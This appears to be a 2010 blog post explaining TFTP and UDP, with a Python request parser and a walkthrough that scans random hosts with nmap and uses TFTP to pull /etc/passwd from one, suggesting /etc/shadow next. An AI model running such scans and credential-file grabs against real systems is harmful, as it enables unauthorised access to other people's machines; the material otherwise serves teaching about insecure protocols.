Wednesday, July 7, 2010

TFTP (69 UDP)

TFTP-TRIVIAL FILE TRANSFER PROTOCOL

TFTP SERVER FEATURES:
* Platform: Windows 2000/XP/2003/Vista/2008/7. The TFTP server runs as a background task.
* Implemented as a Windows system service
* Fully compatible with RFC 1350, RFC 2347, RFC 2348 and RFC 2349
* Runs as a background "around-the-clock" task
* Flexible access-rights configuration based on the client's IP address
* Firewall support: the server lets you specify the range of UDP ports used for transmitting data, so network administrators can write firewall rules that permit exactly the traffic the server generates.
* Full TFTP option support. The server fully supports the 'tsize', 'blksize' (block size) and 'timeout' options, which lets administrators reach maximum performance when transferring data.
* An option to run the server process at the highest priority. This is intended for systems with a large number of TFTP clients and helps serve them at maximum speed.
* Includes graphical utilities for server setup and status monitoring
* High-performance multithreaded architecture

UDP-USER DATAGRAM PROTOCOL

Protocol suite: TCP/IP.
Protocol type: Connectionless transport-layer protocol.
IP protocol number: 17.

The User Datagram Protocol offers only a minimal transport service -- non-guaranteed datagram delivery -- and gives applications direct access to the datagram service of the IP layer. UDP is used by applications that do not require the level of service of TCP or that wish to use communications services (e.g., multicast or broadcast delivery) not available from TCP.

UDP is almost a null protocol; the only services it provides over IP are checksumming of data and multiplexing by port number. Therefore, an application program running over UDP must deal directly with end-to-end communication problems that a connection-oriented protocol would have handled -- e.g., retransmission for reliable delivery, packetization and reassembly, flow control, congestion avoidance, etc., when these are required. The fairly complex coupling between IP and TCP will be mirrored in the coupling between UDP and many applications using UDP.

TFTP-TRIVIAL FILE TRANSFER PROTOCOL

TFTP is your friend. TFTP does not require any authentication; it is usually used by network equipment to fetch its configuration at boot time. A router can be set up to TFTP to a Unix/Windows box and get its config from that box. TFTP runs over UDP and as such is connectionless.

Normally a TFTP server will allow the attacker to transfer any file to him/her (/etc/shadow might be a start). More recent versions of the server restrict you to files that are readable by everyone, and you might find yourself "jailed" in a directory, as with FTP. The other restriction on more recent servers is that the only files that can be written are those that already exist and are writable by everyone. Another difference between TFTP and FTP is that you need to know which file you want; there is no "ls" command, but then again, you can make some intelligent choices.
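As an added example (not part of the original post and not code from any TFTP server product named above), the following Python decodes a TFTP read/write request with its RFC 2347 options, acknowledges only valid 'blksize', 'timeout' and 'tsize' values as described in the feature list, and applies the directory-jail and write-restriction rules described in the paragraph above. The root directory, the 1428-byte default block size cap and the sample datagram are assumptions.

```python
import posixpath, struct

# TFTP request opcodes (RFC 1350); option handling per RFC 2347/2348/2349
OP_RRQ, OP_WRQ = 1, 2

def parse_request(datagram: bytes):
    """Decode RRQ/WRQ: opcode(2) | filename NUL | mode NUL | (option NUL value NUL)*"""
    (opcode,) = struct.unpack("!H", datagram[:2])
    if opcode not in (OP_RRQ, OP_WRQ):
        raise ValueError(f"not a request opcode: {opcode}")
    fields = datagram[2:].split(b"\0")
    if len(fields) < 3 or fields[-1] != b"":
        raise ValueError("request is not NUL-terminated")
    fields = [f.decode("ascii") for f in fields[:-1]]  # drop empty tail after last NUL
    filename, mode, opts = fields[0], fields[1].lower(), fields[2:]
    if mode not in ("netascii", "octet"):  # "mail" is obsolete and refused here
        raise ValueError(f"unsupported mode: {mode}")
    if len(opts) % 2:
        raise ValueError("option name without a value")
    options = {opts[i].lower(): opts[i + 1] for i in range(0, len(opts), 2)}
    return opcode, filename, mode, options

def _int_in(value, lo, hi):  # decimal option value, or None if bad/out of range
    try:
        n = int(value)
    except ValueError:
        return None
    return n if lo <= n <= hi else None

def accept_options(options: dict, max_blksize: int = 1428) -> dict:
    """Keep only valid RFC 2348/2349 values; unknown or bad options are not acknowledged."""
    accepted = {}
    blksize = _int_in(options.get("blksize", ""), 8, 65464)
    if blksize is not None:
        accepted["blksize"] = str(min(blksize, max_blksize))  # server may answer with less
    timeout = _int_in(options.get("timeout", ""), 1, 255)
    if timeout is not None:
        accepted["timeout"] = str(timeout)
    if "tsize" in options:
        accepted["tsize"] = options["tsize"]  # on RRQ the server replaces "0" with the file size
    return accepted

def is_allowed(root: str, opcode: int, filename: str, allow_write: bool = False) -> bool:
    """Lexical jail check (a real server should also realpath() to defeat symlink escapes)."""
    if opcode == OP_WRQ and not allow_write:
        return False
    if not filename or "\\" in filename or filename.startswith("/"):
        return False
    target = posixpath.normpath(posixpath.join(root, filename))
    return target.startswith(posixpath.normpath(root) + "/")
```

A request for "../etc/passwd" or "/etc/passwd" against a root of "/srv/tftp" is refused, and a write request is refused unless the server was started with writes enabled.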

Let us look at an example (this is really easy, but what the heck). First I use nmap to find a machine out there with an open TFTP port. Note that for this scan (a UDP scan) you'll need to allow UDP (duh) and ICMP into your network, as nmap relies on ICMP port-unreachable replies to decide the port's state.

# nmap -sU -iR -p 69   (nmap output omitted)
> tftp
tftp> connect 129.xxx.121.46
tftp> get /etc/password /tmp/passwd
tftp> get /etc/passwd /tmp/passwd
Received 679 bytes in 1.9 seconds
tftp> q
/> more /tmp/passwd

root:*:0:0:System Administrator:/root:/usr/contrib/bin/bash
daemon:*:1:1:System Daemon:/:/sbin/nologin
sys:*:2:2:Operating System:/tmp:/sbin/nologin
bin:*:3:7:BSDI Software:/usr/bsdi:/sbin/nologin
operator:*:5:5:System Operator:/usr/opr:/sbin/nologin
uucp:*:6:6:UNIX-to-UNIX Copy:/var/spool/uucppublic:/usr/libexec/uucico
games:*:7:13:Games Pseudo-user:/usr/games:/sbin/nologin
news:*:9:8:USENET News,,,:/var/news/etc:/sbin/nologin
demo:*:10:13:Demo User:/usr/demo:/sbin/nologin
www:*:51:84:WWW-server:/var/www:/sbin/nologin
nobody:*:32767:32766:Unprivileged user:/nonexistent:/sbin/nologin
nonroot:*:65534:32766:Non-root root user for NFS:/nonexistent:/sbin/nologin

Note: I transfer the /etc/passwd file to the temp directory. If you do the TFTP as root and you are not careful, you will overwrite your own /etc/passwd file :). We have the password file; it is shadowed, but we can now easily get any other file (the real password file, etc.).

If you have any doubts, just mail us; our team will find the solution and clarify it as soon as possible.

Regards,
S-TECHNOLOGIES team